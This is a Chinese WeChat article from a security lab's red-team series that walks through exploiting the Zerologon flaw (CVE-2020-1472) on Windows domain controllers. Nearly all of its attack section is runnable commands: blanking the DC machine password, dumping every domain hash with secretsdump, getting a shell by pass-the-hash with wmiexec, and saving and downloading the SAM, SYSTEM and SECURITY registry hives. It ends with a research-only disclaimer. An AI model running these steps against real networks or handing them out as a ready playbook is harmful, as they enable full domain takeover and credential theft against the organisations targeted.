原创 pbfochk 宸极实验室
微信号 ChenJiLab
功能介绍 『宸极实验室』隶属山东九州信泰信息科技股份有限公司,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。实验室圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
__
收录于话题
#红蓝对抗
12个
点击蓝字 | 关注我们
日期:2021-08-10
作者:pbfochk
介绍:CVE-2020-1472 的漏洞利用。
CVE-2020-1472
是Windows
域控中严重的远程权限提升漏洞,是因为微软在Netlogon
协议中没有正确使用加密算法而导致的漏洞。目标机器系统版本如果在影响范围内,只要与目标机器可以进行网络连接即可在短时间内控制域控主机,影响较大,CVSS
评分10.0
。
影响版本
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)Windows Server 2012Windows Server 2012 (Server Core installation)Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation)Windows Server 2016Windows Server 2016 (Server Core installation)Windows Server 2019Windows Server 2019 (Server Core installation)Windows Server, version 1903 (Server Core installation)Windows Server, version 1909 (Server Core installation)Windows Server, version 2004 (Server Core installation)
首先安装impacket
网络协议工具包。 impacket
网络协议工具包:
https://github.com/SecureAuthCorp/impacket
POC
脚本地址: https://github.com/SecuraBV/CVE-2020-1472
POC
测试目标漏洞是否存在:
python zerologon_tester.py DC 192.168.31.240
EXP
脚本地址: https://github.com/risksense/zerologon
python set_empty_pw.py DC 192.168.31.240
置空密码后获取目标域内所有hash
:
python secretsdump.py seep.cc/DC\$@192.168.31.240 -no-pass
获取到域控administrator
的hash
,可解密得到明文密码后直接RDP,解密失败也可使用wmiexec
,psexec
等传递hash
执行cmd
。
域控密码已被置空。
使用impacket
包内的wmiexec
直接获取域控shell
:
python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:7782c491c3a02792f0e86319b29e7a24 Administrator@192.168.31.240
目标机器hash
长时间为空密码会导致脱域,对域环境产生重大影响,所以在拿到权限后需尽快恢复hash
。
获取目标机器shell
后,在cmd
中执行或者上线CS
后执行命令并下载文件到本地。
reg save HKLM\SYSTEM system.savereg save HKLM\SAM sam.savereg save HKLM\SECURITY security.saveget system.saveget sam.saveget security.savedel /f system.savedel /f sam.savedel /f security.save
获取到本地后利用secretsdump
解析原hash
:
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
获取原hash
后还原:
python3 reinstall_original_pw.py DC 192.168.31.240 aecc311d1181efcde6ff2f744b3060d8
查询域控hash
是否还原成功:
secretsdump.py seep.cc/administrator:dcadmin@123@192.168.31.240 -just-dc-user 'DC$'
此漏洞只要与目标机器建立网络连接便可进行漏洞利用,在域环境内可以造成域控沦陷等严重后果。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
预览时标签不可点
收录于话题 #
个 __
上一篇 下一篇
阅读
分享 收藏
赞 在看
____已同步到看一看写下你的想法
前往“发现”-“看一看”浏览“朋友在看”
前往看一看
看一看入口已关闭
在“设置”-“通用”-“发现页管理”打开“看一看”入口
我知道了
__
已发送
取消 __
发送
『红蓝对抗』域内大杀器之CVE-2020-1472
最多200字,当前共字
__
发送中
写下你的留言
微信扫一扫
关注该公众号
微信扫一扫
使用小程序
取消 允许
取消 允许
知道了
长按识别前往小程序